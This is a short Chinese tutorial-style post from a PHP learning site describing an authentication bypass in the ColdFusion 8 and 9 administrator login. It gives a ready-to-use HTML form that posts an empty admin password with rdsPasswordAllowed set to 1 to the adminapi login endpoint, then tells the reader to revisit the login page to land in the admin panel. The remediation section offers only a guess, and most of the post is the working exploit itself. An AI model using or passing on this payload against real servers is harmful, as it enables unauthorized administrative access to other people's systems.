来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] coldfusion版本8后台登录时,只需要提交一个表单,就可以绕过用户名密码验证,登陆后台这是登录页面然后本地写一个表单提交页面form action=http://XXXX.XXX/CFIDE/adminapi/administrator.cfc?method=...
coldfusion版本8后台登录时,只需要提交一个表单,就可以绕过用户名密码验证,登陆后台
这是登录页面
然后本地写一个表单提交页面
<form action="http://XXXX.XXX/CFIDE/adminapi/administrator.cfc?method=login" method="post"> <input type="hidden" name="adminpassword" value=""> <input type="hidden" name="rdsPasswordAllowed" value="1"> <input type="submit"> </form>
保存为html运行
点击"提交查询"
然后再次访问登录页面,此时已进入后台
此漏洞使用于coldfusion8、9版本
修复方案:
修复方案是添加过滤方式吧,我也不清楚 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com